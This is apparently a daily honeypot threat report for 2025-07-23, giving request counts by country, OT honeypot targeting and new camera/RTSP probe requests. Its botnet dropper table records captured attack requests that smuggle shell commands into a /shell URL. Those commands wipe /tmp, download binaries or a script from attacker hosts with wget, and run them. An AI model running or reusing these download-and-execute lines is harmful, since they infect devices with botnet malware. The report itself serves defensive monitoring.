Daily Report: 2025-07-23#
Executive summary#
interaction report on http service of various Hhoneypot around the world.
- Executive summary
- OT report simplified
- Botnet dropper behaviour
- List of request
- List of country_iso_code
executive_summary#
In today’s repport, we detected 4 stage 1 IP address(es), linked to 2 dropper URL(s).
There are 4 new requests that have never been observed before (these were added to the monitored request database.).
A total of 3297 requests were recorded during the day, originating from 4 different countries, with a peak of 2717 requests coming from GB.
ot_simplified_report#
simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.
source_country | targeted_country |
---|---|
US | Germany |
CA | Dubai |
US | Dubai |
botnet_dropper_behaviour#
remote_addr | request |
---|---|
45.153.34.79 | GET /shell?cd+/tmp;rm+-rf+arm7;nohup+wget+http:/\x5C/45.153.34.32/x86;chmod+777+x86;./x86 jaws;cd+/tmp;rm+-rf+arm7;nohup+wget+http:/\x5C/45.153.34.32/arm7;chmod+777+arm7;./arm7 jaws HTTP/1.1 |
8.222.166.37 | GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1 |
8.219.175.101 | GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1 |
47.236.184.10 | GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1 |
request#
The list of requests presented here are those that have not yet been yet integrated into the request database.
number_of_occurence | request | |
---|---|---|
1 | 30 | DESCRIBE rtsp://xxx.xxx.xxx.xxx:80/Streaming/Channels/101 RTSP/1.0 |
6 | 10 | GET /Streaming/Channels/101 HTTP/1.1 |
7 | 9 | GET /Streaming/Channels/101 HTTP/1.0 |
13 | 5 | OPTIONS rtsp://xxx.xxx.xxx.xxx:80/Streaming/Channels/101 RTSP/1.0 |
country_iso_code#
number_of_occurence | country_iso_code | |
---|---|---|
0 | 2717 | GB |
1 | 311 | US |
2 | 61 | IN |
3 | 28 | CA |
4 | 21 | NL |
5 | 18 | BG |
6 | 18 | NG |
7 | 17 | PL |
8 | 15 | DE |
9 | 13 | SC |
10 | 13 | HK |
11 | 11 | RO |
12 | 7 | ZA |
13 | 6 | SG |
14 | 5 | FR |
15 | 5 | IR |
16 | 4 | JP |
17 | 4 | MU |
18 | 4 | PT |
19 | 3 | KZ |
20 | 2 | BE |
21 | 2 | CN |
22 | 2 | CH |
23 | 2 | RU |
24 | 2 | ID |
25 | 1 | ES |
26 | 1 | CR |
27 | 1 | UA |
28 | 1 | IT |
29 | 1 | BR |
30 | 1 | MC |